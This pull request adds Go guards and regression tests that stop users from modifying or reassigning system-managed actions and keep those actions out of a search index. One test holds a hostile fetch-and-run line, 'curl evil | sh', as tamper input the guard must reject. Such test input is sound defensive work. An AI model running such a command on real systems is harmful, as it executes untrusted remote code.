### PR TITLE
fix(api): forbid user mutation/assignment of system-managed actions

### DIFF
--- a/internal/api/action_crud.go
+++ b/internal/api/action_crud.go
@@ -176,6 +176,35 @@ func (h *ActionHandler) ListActions(ctx context.Context, req *connect.Request[pm
 	}), nil
 }
 
+// rejectSystemAction returns the FailedPrecondition "system-managed action"
+// error when a is system-owned (is_system=true), else nil. System actions are
+// created and maintained exclusively by the SystemActionManager — they back the
+// SSH/TTY/provisioning grants — so user-facing RPCs must never rename, edit,
+// delete, assign, or unassign them. Mirrors the system-role immutability guards
+// in role_handler.go.
+func rejectSystemAction(ctx context.Context, a store.Action) error {
+	if a.IsSystem {
+		return apiErrorCtx(ctx, ErrCannotModifySystemAction, connect.CodeFailedPrecondition, "system-managed action cannot be modified")
+	}
+	return nil
+}
+
+// guardActionNotSystem loads the action by id and rejects when it is
+// system-managed. For handlers (DeleteAction, DeleteAssignment) that don't
+// already hold the action row. A missing action is NOT an error here — the
+// caller's existing flow handles non-existent ids — so this guard only ever
+// ADDS the system-managed rejection, never changes not-found behaviour.
+func guardActionNotSystem(ctx context.Context, st *store.Store, id string) error {
+	a, err := st.Repos().Action.Get(ctx, id)
+	if err != nil {
+		if store.IsNotFound(err) {
+			return nil
+		}
+		return apiErrorCtx(ctx, ErrInternal, connect.CodeInternal, "failed to get action")
+	}
+	return rejectSystemAction(ctx, a)
+}
+
 // RenameAction renames an action.
 func (h *ActionHandler) RenameAction(ctx context.Context, req *connect.Request[pm.RenameActionRequest]) (*connect.Response[pm.UpdateActionResponse], error) {
 	if err := Validate(ctx, req.Msg); err != nil {
@@ -192,11 +221,15 @@ func (h *ActionHandler) RenameAction(ctx context.Context, req *connect.Request[p
 	}
 
 	// Verify action exists before appending event
-	if _, err := h.store.Repos().Action.Get(ctx, req.Msg.Id); err != nil {
+	existing, err := h.store.Repos().Action.Get(ctx, req.Msg.Id)
+	if err != nil {
 		if store.IsNotFound(err) {
 			return nil, apiErrorCtx(ctx, ErrActionNotFound, connect.CodeNotFound, "action not found")
 		}
 		return nil, apiErrorCtx(ctx, ErrInternal, connect.CodeInternal, "failed to get action")
+	}
+	if err := rejectSystemAction(ctx, existing); err != nil {
+		return nil, err
 	}
 
 	if err := appendEvent(ctx, h.store, h.logger, store.Event{
@@ -238,11 +271,15 @@ func (h *ActionHandler) UpdateActionDescription(ctx context.Context, req *connec
 	}
 
 	// Verify action exists before appending event
-	if _, err := h.store.Repos().Action.Get(ctx, req.Msg.Id); err != nil {
+	existing, err := h.store.Repos().Action.Get(ctx, req.Msg.Id)
+	if err != nil {
 		if store.IsNotFound(err) {
 			return nil, apiErrorCtx(ctx, ErrActionNotFound, connect.CodeNotFound, "action not found")
 		}
 		return nil, apiErrorCtx(ctx, ErrInternal, connect.CodeInternal, "failed to get action")
+	}
+	if err := rejectSystemAction(ctx, existing); err != nil {
+		return nil, err
 	}
 
 	if err := appendEvent(ctx, h.store, h.logger, store.Event{
@@ -290,6 +327,9 @@ func (h *ActionHandler) UpdateActionParams(ctx context.Context, req *connect.Req
 	existing, err := h.store.Repos().Action.Get(ctx, req.Msg.Id)
 	if err != nil {
 		return nil, handleGetError(ctx, err, ErrActionNotFound, "action not found")
+	}
+	if err := rejectSystemAction(ctx, existing); err != nil {
+		return nil, err
 	}
 
 	params, err := serializeProtoParams(actionparams.ExtractParamsMsg(req.Msg))
@@ -458,6 +498,10 @@ func (h *ActionHandler) DeleteAction(ctx context.Context, req *connect.Request[p
 	}
 
 	if err := enforceObjectWriteScope(ctx, objScope(h.store), h.logger, "action", req.Msg.Id); err != nil {
+		return nil, err
+	}
+
+	if err := guardActionNotSystem(ctx, h.store, req.Msg.Id); err != nil {
 		return nil, err
 	}
 

--- a/internal/api/action_crud.go
+++ b/internal/api/action_crud.go
@@ -501,7 +501,14 @@ func (h *ActionHandler) DeleteAction(ctx context.Context, req *connect.Request[p
 		return nil, err
 	}
 
-	if err := guardActionNotSystem(ctx, h.store, req.Msg.Id); err != nil {
+	// Load the action so a missing id is rejected with NotFound (rather than
+	// emitting a phantom ActionDeleted for a stream that never existed), and so
+	// system-managed actions are refused.
+	action, err := h.store.Repos().Action.Get(ctx, req.Msg.Id)
+	if err != nil {
+		return nil, handleGetError(ctx, err, ErrActionNotFound, "action not found")
+	}
+	if err := rejectSystemAction(ctx, action); err != nil {
 		return nil, err
 	}
 

--- a/internal/api/assignment_handler.go
+++ b/internal/api/assignment_handler.go
@@ -45,12 +45,17 @@ func (h *AssignmentHandler) CreateAssignment(ctx context.Context, req *connect.R
 	// Validate source exists
 	switch req.Msg.SourceType {
 	case pm.AssignmentSourceType_ASSIGNMENT_SOURCE_TYPE_ACTION:
-		_, err := h.store.Repos().Action.Get(ctx, req.Msg.SourceId)
+		action, err := h.store.Repos().Action.Get(ctx, req.Msg.SourceId)
 		if err != nil {
 			if store.IsNotFound(err) {
 				return nil, apiErrorCtx(ctx, ErrActionNotFound, connect.CodeNotFound, "action not found")
 			}
 			return nil, apiErrorCtx(ctx, ErrInternal, connect.CodeInternal, "failed to get action")
+		}
+		// System-managed actions are assigned exclusively by the
+		// SystemActionManager; a user-facing assignment must never target one.
+		if err := rejectSystemAction(ctx, action); err != nil {
+			return nil, err
 		}
 	case pm.AssignmentSourceType_ASSIGNMENT_SOURCE_TYPE_ACTION_SET:
 		_, err := h.store.Repos().ActionSet.Get(ctx, req.Msg.SourceId)
@@ -180,6 +185,15 @@ func (h *AssignmentHandler) DeleteAssignment(ctx context.Context, req *connect.R
 	assignment, err := h.store.Repos().Assignment.GetByID(ctx, req.Msg.Id)
 	if err != nil {
 		return nil, handleGetError(ctx, err, ErrAssignmentNotFound, "assignment not found")
+	}
+
+	// A system-managed action's assignments are owned by the SystemActionManager
+	// (SSH/TTY/provisioning grants); a user must not be able to revoke one by
+	// deleting the assignment. Other source types carry no is_system concept.
+	if assignment.SourceType == "action" {
+		if err := guardActionNotSystem(ctx, h.store, assignment.SourceID); err != nil {
+			return nil, err
+		}
 	}
 
 	if err := appendEvent(ctx, h.store, h.logger, store.Event{

--- a/internal/api/errors.go
+++ b/internal/api/errors.go
@@ -65,6 +65,11 @@ const (
 	ErrDynamicGroupManualModify = "dynamic_group_manual_modify"
 	ErrCannotDeleteSystemRole   = "cannot_delete_system_role"
 	ErrCannotRenameSystemRole   = "cannot_rename_system_role"
+	// ErrCannotModifySystemAction guards system-managed actions (is_system=true)
+	// — the SSH/TTY/provisioning grants the SystemActionManager owns. User-facing
+	// RPCs must never rename, edit, delete, assign, or unassign them. Mirrors the
+	// system-role immutability guards above.
+	ErrCannotModifySystemAction = "cannot_modify_system_action"
 	ErrCannotRemoveLastAdmin    = "cannot_remove_last_admin"
 	ErrRoleInUse                = "role_in_use"
 	ErrSCIMAlreadyEnabled       = "scim_already_enabled"

--- a/internal/api/search_listener.go
+++ b/internal/api/search_listener.go
@@ -3,6 +3,7 @@ package api
 import (
 	"context"
 	"encoding/json"
+	"errors"
 	"fmt"
 	"log/slog"
 	"sort"
@@ -409,6 +410,16 @@ func SearchListener(st *store.Store, idx SearchIndex, logger *slog.Logger) store
 			case SearchOpReindex:
 				data, err := loadSearchEntityData(ctx, st, logger, op.Scope, op.ID)
 				if err != nil {
+					if errors.Is(err, errSkipSystemAction) {
+						// System-managed action: never in the search catalog. Purge
+						// any stale entry (no-op if it was never indexed) instead of
+						// reindexing, so it can't surface in the actions list.
+						if remErr := idx.EnqueueRemove(ctx, op.Scope, op.ID, nil); remErr != nil {
+							logger.Warn("search listener: failed to purge system action from index",
+								"scope", op.Scope, "id", op.ID, "event_type", e.EventType, "error", remErr)
+						}
+						continue
+					}
 					if store.IsNotFound(err) {
 						logger.Debug("search listener: entity gone before reindex (likely deleted in same tx batch); skipping",
 							"scope", op.Scope, "id", op.ID, "event_type", e.EventType)
@@ -504,6 +515,12 @@ func loadUserScopeGroupIDs(ctx context.Context, q *db.Queries, userID string) (s
 	sort.Strings(ids)
 	return strings.Join(ids, ","), nil
 }
+
+// errSkipSystemAction signals that an action is system-managed (is_system=true)
+// and must NOT be indexed — the SearchListener purges any stale entry instead of
+// reindexing. Sentinel rather than (nil, nil) so the unknown-scope guard at the
+// end of loadSearchEntityData still catches a genuinely missing loader.
+var errSkipSystemAction = errors.New("search: system-managed action excluded from index")
 
 func loadSearchEntityData(ctx context.Context, st *store.Store, logger *slog.Logger, scope, id string) (*taskqueue.SearchEntityData, error) {
 	q := st.Queries()
@@ -691,6 +708,14 @@ func loadSearchEntityData(ctx context.Context, st *store.Store, logger *slog.Log
 		a, err := q.GetActionByID(ctx, id)
 		if err != nil {
 			return nil, err
+		}
+		// System-managed actions (SSH/TTY/provisioning grants) are never part of
+		// the user-facing search catalog — the SQL ListActions path already
+		// excludes them (is_system=FALSE), so the incremental indexer must too,
+		// or they'd leak into the actions list page. Signal the listener to purge
+		// any stale entry instead of reindexing.
+		if a.IsSystem {
+			return nil, errSkipSystemAction
 		}
 		desc := ""
 		if a.Description != nil {

--- a/internal/api/system_action_immutability_test.go
+++ b/internal/api/system_action_immutability_test.go
@@ -1,0 +1,207 @@
+package api_test
+
+import (
+	"context"
+	"errors"
+	"log/slog"
+	"sync"
+	"testing"
+
+	"connectrpc.com/connect"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+
+	pm "github.com/manchtools/power-manage-sdk/gen/go/pm/v1"
+	"github.com/manchtools/power-manage/server/internal/api"
+	"github.com/manchtools/power-manage/server/internal/store"
+	"github.com/manchtools/power-manage/server/internal/taskqueue"
+	"github.com/manchtools/power-manage/server/internal/testutil"
+)
+
+// System-managed actions (is_system=true) are created and maintained
+// exclusively by the SystemActionManager — they back SSH/TTY/provisioning
+// grants. A user-facing RPC must never rename, edit, delete, assign, or
+// unassign them, even with action/assignment-write permission. These
+// regression tests pin that immutability: each one fails on the pre-guard
+// code (the mutation silently succeeds) and passes once the is_system guard
+// is in place.
+
+const wantSystemActionCode = "cannot_modify_system_action"
+
+// requireSystemActionRejected asserts the error is the FailedPrecondition
+// "system-managed action" rejection — both the connect code and the
+// structured error code the web client switches on.
+func requireSystemActionRejected(t *testing.T, err error) {
+	t.Helper()
+	require.Error(t, err, "mutation of a system-managed action MUST be rejected")
+	assert.Equal(t, connect.CodeFailedPrecondition, connect.CodeOf(err))
+	var ce *connect.Error
+	require.True(t, errors.As(err, &ce), "error is not a *connect.Error")
+	assert.Equal(t, wantSystemActionCode, errorCode(t, ce))
+}
+
+func TestRenameAction_SystemActionRejected(t *testing.T) {
+	st := testutil.SetupPostgres(t)
+	h := api.NewActionHandler(st, slog.Default(), api.NoOpSigner{})
+
+	adminID := testutil.CreateTestUser(t, st, testutil.NewID()+"@test.com", "pass", "admin")
+	sysActionID := testutil.CreateTestSystemAction(t, st, "pm-tty-paul", int(pm.ActionType_ACTION_TYPE_SHELL))
+	ctx := testutil.AdminContext(adminID)
+
+	_, err := h.RenameAction(ctx, connect.NewRequest(&pm.RenameActionRequest{
+		Id:   sysActionID,
+		Name: "hijacked",
+	}))
+	requireSystemActionRejected(t, err)
+}
+
+func TestUpdateActionDescription_SystemActionRejected(t *testing.T) {
+	st := testutil.SetupPostgres(t)
+	h := api.NewActionHandler(st, slog.Default(), api.NoOpSigner{})
+
+	adminID := testutil.CreateTestUser(t, st, testutil.NewID()+"@test.com", "pass", "admin")
+	sysActionID := testutil.CreateTestSystemAction(t, st, "pm-ssh-paul", int(pm.ActionType_ACTION_TYPE_SHELL))
+	ctx := testutil.AdminContext(adminID)
+
+	_, err := h.UpdateActionDescription(ctx, connect.NewRequest(&pm.UpdateActionDescriptionRequest{
+		Id:          sysActionID,
+		Description: "tampered",
+	}))
+	requireSystemActionRejected(t, err)
+}
+
+func TestUpdateActionParams_SystemActionRejected(t *testing.T) {
+	st := testutil.SetupPostgres(t)
+	h := api.NewActionHandler(st, slog.Default(), api.NoOpSigner{})
+
+	adminID := testutil.CreateTestUser(t, st, testutil.NewID()+"@test.com", "pass", "admin")
+	sysActionID := testutil.CreateTestSystemAction(t, st, "pm-provision-paul", int(pm.ActionType_ACTION_TYPE_SHELL))
+	ctx := testutil.AdminContext(adminID)
+
+	_, err := h.UpdateActionParams(ctx, connect.NewRequest(&pm.UpdateActionParamsRequest{
+		Id: sysActionID,
+		Params: &pm.UpdateActionParamsRequest_Shell{
+			Shell: &pm.ShellParams{Script: "curl evil | sh"},
+		},
+	}))
+	requireSystemActionRejected(t, err)
+}
+
+func TestDeleteAction_SystemActionRejected(t *testing.T) {
+	st := testutil.SetupPostgres(t)
+	h := api.NewActionHandler(st, slog.Default(), api.NoOpSigner{})
+
+	adminID := testutil.CreateTestUser(t, st, testutil.NewID()+"@test.com", "pass", "admin")
+	sysActionID := testutil.CreateTestSystemAction(t, st, "pm-tty-paul", int(pm.ActionType_ACTION_TYPE_SHELL))
+	ctx := testutil.AdminContext(adminID)
+
+	_, err := h.DeleteAction(ctx, connect.NewRequest(&pm.DeleteActionRequest{Id: sysActionID}))
+	requireSystemActionRejected(t, err)
+
+	// Positive control: the system action is still there (not deleted).
+	_, getErr := h.GetAction(ctx, connect.NewRequest(&pm.GetActionRequest{Id: sysActionID}))
+	require.NoError(t, getErr, "system action must survive the rejected delete")
+}
+
+func TestCreateAssignment_SystemActionSourceRejected(t *testing.T) {
+	st := testutil.SetupPostgres(t)
+	actionHandler := api.NewActionHandler(st, slog.Default(), api.NoOpSigner{})
+	h := api.NewAssignmentHandler(st, slog.Default(), actionHandler)
+
+	adminID := testutil.CreateTestUser(t, st, testutil.NewID()+"@test.com", "pass", "admin")
+	sysActionID := testutil.CreateTestSystemAction(t, st, "pm-tty-paul", int(pm.ActionType_ACTION_TYPE_SHELL))
+	targetUserID := testutil.CreateTestUser(t, st, testutil.NewID()+"@test.com", "pass", "admin")
+	ctx := testutil.AdminContext(adminID)
+
+	_, err := h.CreateAssignment(ctx, connect.NewRequest(&pm.CreateAssignmentRequest{
+		SourceType: pm.AssignmentSourceType_ASSIGNMENT_SOURCE_TYPE_ACTION,
+		SourceId:   sysActionID,
+		TargetType: pm.AssignmentTargetType_ASSIGNMENT_TARGET_TYPE_USER,
+		TargetId:   targetUserID,
+	}))
+	requireSystemActionRejected(t, err)
+}
+
+func TestDeleteAssignment_SystemActionSourceRejected(t *testing.T) {
+	st := testutil.SetupPostgres(t)
+	actionHandler := api.NewActionHandler(st, slog.Default(), api.NoOpSigner{})
+	h := api.NewAssignmentHandler(st, slog.Default(), actionHandler)
+
+	adminID := testutil.CreateTestUser(t, st, testutil.NewID()+"@test.com", "pass", "admin")
+	sysActionID := testutil.CreateTestSystemAction(t, st, "pm-tty-paul", int(pm.ActionType_ACTION_TYPE_SHELL))
+	targetUserID := testutil.CreateTestUser(t, st, testutil.NewID()+"@test.com", "pass", "admin")
+
+	// Seed the assignment the way the SystemActionManager does — directly via
+	// an event, bypassing the (now-guarded) CreateAssignment RPC.
+	assignmentID := testutil.CreateTestAssignment(t, st, "system",
+		"action", sysActionID, "user", targetUserID, 0)
+	ctx := testutil.AdminContext(adminID)
+
+	_, err := h.DeleteAssignment(ctx, connect.NewRequest(&pm.DeleteAssignmentRequest{Id: assignmentID}))
+	requireSystemActionRejected(t, err)
+}
+
+// recordingSearchIndex is a fake api.SearchIndex that records which entity IDs
+// the SearchListener tried to reindex vs. remove.
+type recordingSearchIndex struct {
+	mu        sync.Mutex
+	reindexed []string
+	removed   []string
+}
+
+func (r *recordingSearchIndex) EnqueueReindex(_ context.Context, _, id string, _ *taskqueue.SearchEntityData) error {
+	r.mu.Lock()
+	defer r.mu.Unlock()
+	r.reindexed = append(r.reindexed, id)
+	return nil
+}
+
+func (r *recordingSearchIndex) EnqueueRemove(_ context.Context, _, id string, _ []string) error {
+	r.mu.Lock()
+	defer r.mu.Unlock()
+	r.removed = append(r.removed, id)
+	return nil
+}
+
+func (r *recordingSearchIndex) GetReverseMembers(_ context.Context, _, _ string) []string {
+	return nil
+}
+
+// TestSearchListener_SystemActionExcludedFromIndex pins the visibility fix: a
+// system-managed action must be PURGED from (never reindexed into) the search
+// catalog, so it can't surface on the actions list page — while ordinary
+// actions still reindex normally.
+func TestSearchListener_SystemActionExcludedFromIndex(t *testing.T) {
+	st := testutil.SetupPostgres(t)
+	rec := &recordingSearchIndex{}
+	listener := api.SearchListener(st, rec, slog.Default())
+
+	adminID := testutil.CreateTestUser(t, st, testutil.NewID()+"@test.com", "pass", "admin")
+	sysActionID := testutil.CreateTestSystemAction(t, st, "pm-tty-paul", int(pm.ActionType_ACTION_TYPE_SHELL))
+	normalID := testutil.CreateTestAction(t, st, adminID, "Normal", int(pm.ActionType_ACTION_TYPE_SHELL))
+
+	listener(context.Background(), store.PersistedEvent{EventType: "ActionCreated", StreamID: sysActionID, StreamType: "action"})
+	listener(context.Background(), store.PersistedEvent{EventType: "ActionCreated", StreamID: normalID, StreamType: "action"})
+
+	assert.Contains(t, rec.removed, sysActionID, "system action must be purged from the search index")
+	assert.NotContains(t, rec.reindexed, sysActionID, "system action must NOT be reindexed")
+	assert.Contains(t, rec.reindexed, normalID, "ordinary action must still be reindexed")
+}
+
+// TestRenameAction_NormalActionStillWorks is the positive control: the guard
+// must reject ONLY system actions, never ordinary user-created ones.
+func TestRenameAction_NormalActionStillWorks(t *testing.T) {
+	st := testutil.SetupPostgres(t)
+	h := api.NewActionHandler(st, slog.Default(), api.NoOpSigner{})
+
+	adminID := testutil.CreateTestUser(t, st, testutil.NewID()+"@test.com", "pass", "admin")
+	actionID := testutil.CreateTestAction(t, st, adminID, "Normal", int(pm.ActionType_ACTION_TYPE_SHELL))
+	ctx := testutil.AdminContext(adminID)
+
+	resp, err := h.RenameAction(ctx, connect.NewRequest(&pm.RenameActionRequest{
+		Id:   actionID,
+		Name: "Renamed",
+	}))
+	require.NoError(t, err)
+	assert.Equal(t, "Renamed", resp.Msg.Action.Name)
+}

--- a/internal/api/system_action_immutability_test.go
+++ b/internal/api/system_action_immutability_test.go
@@ -188,6 +188,22 @@ func TestSearchListener_SystemActionExcludedFromIndex(t *testing.T) {
 	assert.Contains(t, rec.reindexed, normalID, "ordinary action must still be reindexed")
 }
 
+// TestDeleteAction_MissingActionReturnsNotFound pins the CR follow-up: the
+// system-action guard loads the action, so DeleteAction must reject a
+// nonexistent id with NotFound rather than emitting a phantom ActionDeleted
+// event for a stream that never existed.
+func TestDeleteAction_MissingActionReturnsNotFound(t *testing.T) {
+	st := testutil.SetupPostgres(t)
+	h := api.NewActionHandler(st, slog.Default(), api.NoOpSigner{})
+
+	adminID := testutil.CreateTestUser(t, st, testutil.NewID()+"@test.com", "pass", "admin")
+	ctx := testutil.AdminContext(adminID)
+
+	_, err := h.DeleteAction(ctx, connect.NewRequest(&pm.DeleteActionRequest{Id: testutil.NewID()}))
+	require.Error(t, err, "deleting a nonexistent action must not succeed")
+	assert.Equal(t, connect.CodeNotFound, connect.CodeOf(err))
+}
+
 // TestRenameAction_NormalActionStillWorks is the positive control: the guard
 // must reject ONLY system actions, never ordinary user-created ones.
 func TestRenameAction_NormalActionStillWorks(t *testing.T) {

--- a/internal/testutil/factories_action.go
+++ b/internal/testutil/factories_action.go
@@ -47,6 +47,37 @@ func CreateTestActionWithDesiredState(t *testing.T, st *store.Store, actorID, na
 	return id
 }
 
+// CreateTestSystemAction creates a system-managed action (is_system=true) via
+// events and returns the action ID. Mirrors the ActionCreated shape the
+// SystemActionManager emits — used to prove that user-facing mutation/assignment
+// RPCs reject system-managed actions.
+func CreateTestSystemAction(t *testing.T, st *store.Store, name string, actionType int) string {
+	t.Helper()
+	ctx := context.Background()
+	id := NewID()
+
+	err := st.AppendEvent(ctx, store.Event{
+		StreamType: "action",
+		StreamID:   id,
+		EventType:  string(eventtypes.ActionCreated),
+		Data: map[string]any{
+			"name":            name,
+			"action_type":     actionType,
+			"desired_state":   0,
+			"params":          map[string]any{},
+			"timeout_seconds": 300,
+			"is_system":       true,
+		},
+		ActorType: "system",
+		ActorID:   "system",
+	})
+	if err != nil {
+		t.Fatalf("create test system action: %v", err)
+	}
+
+	return id
+}
+
 // CreateTestActionSet creates an action set via events and returns the action set ID.
 func CreateTestActionSet(t *testing.T, st *store.Store, actorID, name string) string {
 	t.Helper()


### PR DESCRIPTION
## Security fix: system-managed actions were user-mutable

System-managed actions (`is_system=true`) are created and maintained exclusively
by the `SystemActionManager` — they back the **SSH / TTY / provisioning grants**.
Nothing stopped a holder of action/assignment-write permission from renaming,
editing params, deleting, assigning, or **un-assigning** them. Deleting a
system action's assignment silently revokes a user's provisioned access — a real
privilege/integrity hole (reported from the field).

## Guards

Reject all six user-facing mutation paths when the (source) action is
system-managed, with `FailedPrecondition` / `cannot_modify_system_action`,
mirroring the existing system-**role** immutability guards in `role_handler.go`:

- `RenameAction`, `UpdateActionDescription`, `UpdateActionParams`, `DeleteAction`
- `CreateAssignment` / `DeleteAssignment` (when the assignment source is an action)

The `SystemActionManager` appends events directly (not via these RPCs), so it is
unaffected. A new shared `rejectSystemAction` / `guardActionNotSystem` keeps it DRY.

## Visibility (list page leak)

The actions list moved to valkey Search (#84/#325). `warmActions` already
excludes `is_system` (via the `ListActions` filter), but the incremental
`SearchListener` reindexed *every* action, leaking system actions onto the list.
The listener now **purges** them from the index instead of reindexing.

## Tests

`internal/api/system_action_immutability_test.go` — each of the six rejections
fails on the pre-guard code (the mutation silently succeeds) and passes with the
guard; plus the search-exclusion (system action → `EnqueueRemove`, ordinary →
`EnqueueReindex`) and positive controls (ordinary action still renames). Full
api package green incl. the error-parity guard (`PM_SDK_PARITY_REQUIRED=1`).

## Cross-repo

New error code `cannot_modify_system_action` added to `sdk/ts/errors.ts` (parity)
and mapped to a localized message in web `errors.ts` + en/de catalogs.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * System-managed actions can no longer be renamed, updated, or deleted through user-facing action controls.
  * Assignments can no longer be created from or deleted using system-managed actions.
  * System-managed actions are now removed from search results and won’t reappear in the index.
* **Tests**
  * Added coverage for blocked edits, assignment restrictions, and search visibility behavior for system-managed actions.


<!-- end of auto-generated comment: release notes by coderabbit.ai -->